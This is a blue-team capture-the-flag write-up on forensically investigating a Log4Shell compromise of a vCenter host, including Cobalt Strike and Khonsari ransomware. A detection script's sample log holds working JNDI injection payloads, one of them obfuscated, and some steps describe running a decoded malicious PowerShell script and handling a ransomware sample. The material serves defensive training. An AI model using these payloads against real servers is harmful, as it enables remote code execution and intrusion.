Windows Disk Image Forensics — DetectLog4j (CyberDefenders BlueTeam CTF)
On December 9, 2021, a critical vulnerability in the popular Log4j Java logging library was disclosed and nicknamed Log4Shell. It is tracked as CVE-2021-44228 and is a remote code execution vulnerability that can give an attacker full control of any impacted system. CyberDefenders released a Windows disk forensics challenge built around detecting Log4j exploitation.
This is a blue team CTF made for security researchers and SOC practitioners to practice their analysis skills.
#1 What is the computer hostname?
Check the Operating System Information artifact; the hostname is vcw65.
#2 What is the Timezone of the compromised machine?
SYSTEM > ControlSet001 > Control > TimeZoneInformation
Pacific Standard Time (UTC-8)
#3 What is the current build number on the system?
SOFTWARE > Microsoft > Windows NT > CurrentVersion
CurrentBuild: 14393
#4 What is the computer IP?
SYSTEM > ControlSet001 > Services > Tcpip > Parameters > Interfaces > {interface GUID}
DhcpIPAddress REG_SZ 192.168.112.139
#5 What is the domain computer was assigned to?
SYSTEM > ControlSet001 > Services > Tcpip > Parameters; the Domain (and NV Domain) value holds the DNS domain the machine was joined to.
#6 When was myoussef user created?
Go to OS Accounts in the left column and search for myoussef.
The creation time shows as 2021-12-28 14:57:23 CST. Submitted that and it failed, then converted it to UTC (2021-12-28 06:57:23 UTC; the CST shown is the analyst's local zone, UTC+8) and it worked!
#7 What is the user mhasan password hint?
Go to OS Accounts and search for mhasan.
The password hint is: https://www.linkedin.com/in/0xmohamedhasan/
#8 What is the version of the VMware product installed on the machine?
Data Artifacts > Installed Programs
Search for the VMware product; the version listed is 220.127.116.11322
#9 What is the version of the log4j library used by the installed VMware product?
Go to Program Files\VMware\vCenter Server\common-jars; the log4j jar file names carry the library version.
#10 What is the log4j library log level specified in the configuration file?
Keyword search for 'log4j' and open log4j.properties; the log level is set in the logger configuration lines.
#11 The attacker exploited log4shell through an HTTP login request. What is the HTTP header used to inject payload?
Google "vcenter log4j exploit".
"The vulnerability is in the X-Forwarded-For header on the vCenter SSO login page…", so the HTTP header is X-Forwarded-For.
Source: Sprocket Security, "How to exploit Log4j vulnerabilities in VMWare..."
#12 The attacker used the log4shell.huntress.com payload to detect if vcenter instance is vulnerable. What is the first link of the log4huntress payload?
Keyword search for 'log4shell.huntress.com'.
Open websso.log and the payload is there.
#13 When was the first successful login to vsphere WebClient?
First successful login: 12/28/2021 12:39:29 PST
Submitted in UTC: 28/12/2021 20:39:29 UTC
#14 What is the attacker’s IP address?
Look for the attacker's IP in audit_events.log.
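Searching the logs for the huntress probe, the injected header and the attacker's address (#11 to #14) can be scripted. The following is an added example, not part of the original write-up or the challenge files: it runs over a few constructed log lines shaped like vCenter's websso.log, collapses the ${lower:}/${::-} obfuscation attackers use to dodge naive "${jndi:" greps, and reports which header carried each lookup and where it points. The log lines, hostnames and IPs are made up for the example.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample lines (not from the challenge image). They imitate the
# shape of vCenter websso.log entries in which a Log4Shell probe arrives in
# the X-Forwarded-For header; line 2 uses the ${lower:}/${::-} obfuscation
# seen in the wild, line 4 carries a harmless X-Forwarded-For value.
SAMPLE_LOG = """\
2021-12-28T20:31:02Z INFO websso request from 192.168.112.1 X-Forwarded-For: ${jndi:ldap://log4shell.huntress.com:1389/abcd1234}
2021-12-28T20:35:17Z INFO websso request from 192.168.112.1 X-Forwarded-For: ${${lower:j}ndi:${::-l}dap://192.168.112.128:1389/a}
2021-12-28T20:39:29Z INFO websso login success user=Administrator@vsphere.local src=192.168.112.128
2021-12-28T20:40:01Z INFO websso request from 10.0.0.5 X-Forwarded-For: 10.0.0.5
"""

# ${lower:x}, ${upper:x} and the "default value" form ${anything:-x} all
# evaluate to x; collapsing them exposes the plain ${jndi:...} lookup.
_OBFUSCATION = re.compile(r"\$\{(?:lower|upper):([^{}]*)\}|\$\{[^{}]*:-([^{}]*)\}", re.I)
_JNDI = re.compile(
    r"\$\{jndi:(?P<scheme>[a-z]+):/*(?P<host>[^/:}]+)(?::(?P<port>\d+))?(?P<path>[^}]*)\}", re.I)
# "Name: value" tokens; used to find which HTTP header carried the lookup.
_HEADER = re.compile(r"(?P<name>[A-Za-z][A-Za-z0-9-]*):\s*(?P<value>\S+)")
_SRC = re.compile(r"request from (?P<ip>\d{1,3}(?:\.\d{1,3}){3})")


@dataclass
class JndiProbe:
    line_no: int
    src_ip: Optional[str]
    header: Optional[str]
    scheme: str
    host: str
    port: Optional[int]
    raw: str


def normalize(text: str) -> str:
    """Strip nested lookup obfuscation until the string stops changing."""
    previous = None
    while previous != text:
        previous = text
        text = _OBFUSCATION.sub(
            lambda m: m.group(1) if m.group(1) is not None else m.group(2), text)
    return text


def find_jndi_probes(log_text: str) -> List[JndiProbe]:
    """Return every line carrying a JNDI lookup, with the header that carried it."""
    probes = []
    for line_no, line in enumerate(log_text.splitlines(), start=1):
        clean = normalize(line)
        match = _JNDI.search(clean)
        if not match:
            continue
        header = next((h.group("name") for h in _HEADER.finditer(clean)
                       if "${jndi:" in h.group("value").lower()), None)
        src = _SRC.search(clean)
        probes.append(JndiProbe(
            line_no=line_no,
            src_ip=src.group("ip") if src else None,
            header=header,
            scheme=match.group("scheme").lower(),
            host=match.group("host"),
            port=int(match.group("port")) if match.group("port") else None,
            raw=match.group(0),
        ))
    return probes


if __name__ == "__main__":
    for p in find_jndi_probes(SAMPLE_LOG):
        print(f"line {p.line_no}: {p.header} from {p.src_ip} -> {p.scheme}://{p.host}:{p.port}")
```

The callback host in the first hit is the huntress canary; the second points at the attacker's own listener, which is the address to carry over to audit_events.log when pinning down the first successful login.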
#15 What is the port the attacker used to receive the cobalt strike reverse shell?
Search for the base64-encoded PowerShell command.
Decode it with CyberChef: From Base64, then Gunzip.
Download the decoded command and save it with a .ps1 extension (malscript.ps1).
FakeNet-NG, as its project description puts it: "The tool allows you to intercept and redirect all or specific network traffic while simulating legitimate network services. Using FakeNet-NG, malware analysts can quickly identify malware's functionality and capture network signatures. Penetration testers and bug hunters will find FakeNet-NG's configurable interception engine and modular framework highly useful when testing application's specific functionality and prototyping PoCs."
Run malscript.ps1 with fakenet.exe running.
The malware connects to the host on port 1337.
#16 What is the script name published by VMware to mitigate log4shell vulnerability?
#17 In some cases, you may not be able to update the products used in your network. What is the system property needed to set to ‘true’ to work around the log4shell vulnerability?
If updating to the latest version is not possible, the vulnerability can be mitigated by removing the JndiLookup class from the classpath. Additionally, on Log4j versions >= 2.10 it can be mitigated by setting the system property
log4j2.formatMsgNoLookups or the
LOG4J_FORMAT_MSG_NO_LOOKUPS environment variable to true. (Apache later listed this property among the insufficient mitigations after CVE-2021-45046; removing JndiLookup.class or upgrading is the durable fix.)
#18 What is the log4j version which contains a patch to CVE-2021-44228?
#19 Removing JndiLookup.class may help in mitigating log4shell. What is the sha256 hash of JndiLookup.class?
Program Files\VMware\vCenter Server\VMware Identity Services\log4j-core-2.11.2.jar
Extract log4j-core-2.11.2.jar (right-click the file).
Unzip the exported jar file (a jar is a zip archive).
Locate org/apache/logging/log4j/core/lookup/JndiLookup.class.
Get the file's SHA-256 hash.
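The steps for #9, #18 and #19 (read the log4j version out of the jar, check it against the fixed releases, hash JndiLookup.class) as an added Python example; this is not the challenge's or the author's tooling. The jar is built in memory from constructed bytes, so the hash it reports is of the stand-in class, not the real JndiLookup.class; point inspect_path() at a jar exported from the image to get the real values. The version check encodes the releases that fix CVE-2021-44228 (2.15.0, plus the 2.12.2 and 2.3.1 backport lines).

```python
import hashlib
import io
import zipfile
from typing import Dict, Tuple

JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPERTIES = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"

# Constructed stand-in for the class file: a real JndiLookup.class starts with
# the 0xCAFEBABE magic too, but the rest of these bytes are made up.
FAKE_CLASS_BYTES = b"\xca\xfe\xba\xbe" + b"constructed JndiLookup stand-in"
FAKE_CLASS_SHA256 = hashlib.sha256(FAKE_CLASS_BYTES).hexdigest()


def build_sample_jar(version: str, include_jndi: bool) -> bytes:
    """Build an in-memory jar with the two entries the inspector relies on."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr(POM_PROPERTIES,
                    f"groupId=org.apache.logging.log4j\nartifactId=log4j-core\nversion={version}\n")
        zf.writestr("org/apache/logging/log4j/core/Logger.class", b"\xca\xfe\xba\xbe")
        if include_jndi:
            zf.writestr(JNDI_CLASS, FAKE_CLASS_BYTES)
    return buf.getvalue()


def parse_version(version: str) -> Tuple[int, ...]:
    """'2.11.2' -> (2, 11, 2); '2.0-beta9' -> (2, 0)."""
    return tuple(int(part) for part in version.split("-")[0].split(".")[:3])


def vulnerable_to_cve_2021_44228(version: str) -> bool:
    """True for 2.0-beta9 .. 2.14.1, except the 2.12.2+ and 2.3.1+ backport lines."""
    v = parse_version(version)
    if v < (2, 0) or v >= (2, 15, 0):
        return False
    if (2, 12, 2) <= v < (2, 13, 0) or (2, 3, 1) <= v < (2, 4, 0):
        return False
    return True


def inspect_log4j_jar(jar_bytes: bytes) -> Dict[str, object]:
    """Version from pom.properties, SHA-256 of JndiLookup.class, and a verdict."""
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as zf:
        names = set(zf.namelist())
        version = None
        if POM_PROPERTIES in names:
            for line in zf.read(POM_PROPERTIES).decode("utf-8", errors="replace").splitlines():
                if line.startswith("version="):
                    version = line.split("=", 1)[1].strip()
        jndi_sha256 = (hashlib.sha256(zf.read(JNDI_CLASS)).hexdigest()
                       if JNDI_CLASS in names else None)
    # A jar with the class stripped (the documented workaround) is not exploitable
    # via JNDI even when its version string says it is.
    vulnerable = (version is not None and jndi_sha256 is not None
                  and vulnerable_to_cve_2021_44228(version))
    return {"version": version, "jndi_sha256": jndi_sha256, "vulnerable": vulnerable}


def inspect_path(path: str) -> Dict[str, object]:
    """Convenience wrapper for a jar exported from the disk image."""
    with open(path, "rb") as fh:
        return inspect_log4j_jar(fh.read())


if __name__ == "__main__":
    print(inspect_log4j_jar(build_sample_jar("2.11.2", include_jndi=True)))
    print(inspect_log4j_jar(build_sample_jar("2.11.2", include_jndi=False)))
```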
#20 Analyze JndiLookup.class. What is the value stored in the CONTAINER_JNDI_RESOURCE_PATH_PREFIX variable?
Program Files\VMware\vCenter Server\cm\lib\log4j-core.jar
static final String CONTAINER_JNDI_RESOURCE_PATH_PREFIX = "java:comp/env/";
#21 What is the executable used by the attacker to gain persistence?
SOFTWARE > Microsoft > Windows > CurrentVersion > Run
p33r REG_SZ C:\Users\Adiminstrator\Desktop\baaaackdooor.exe
#22 When was the first submission of ransomware to virustotal?
The ransomware is khonsari.exe. Searching for it on VirusTotal, the first submission was 2021-12-11 22:57:01.
#23 The ransomware downloads a text file from an external server. What is the key used to decrypt the URL?
Search the MalwareBazaar database.
Download the malware sample (do this in a safe, isolated environment).
Download dnSpy.
dnSpy is a debugger and .NET assembly editor. You can use it to edit and debug assemblies even if you don't have any source code available. (GitHub: dnSpy/dnSpy, ".NET debugger and assembly editor")
Load the malware into dnSpy.
Right-click dorfier and go to the entry point.
The key is the text 'GoaahQrC'.
#24 What is the ISP that owns that IP that serves the text file?
Search on VirusTotal.
The contacted domain is a cloud server address from Amazon.
#25 The ransomware checks for extensions to exclude them from the encryption process. What is the second extension the ransomware checks for?
After downloading the string, the malware enumerates drives and mounts them,
then encrypts all contents found.
Source: "Khonsari Ransomware Campaign Exploiting the Log4Shell Vulnerability"
The article's analysis of Khonsari shows its behavior, including the extension check.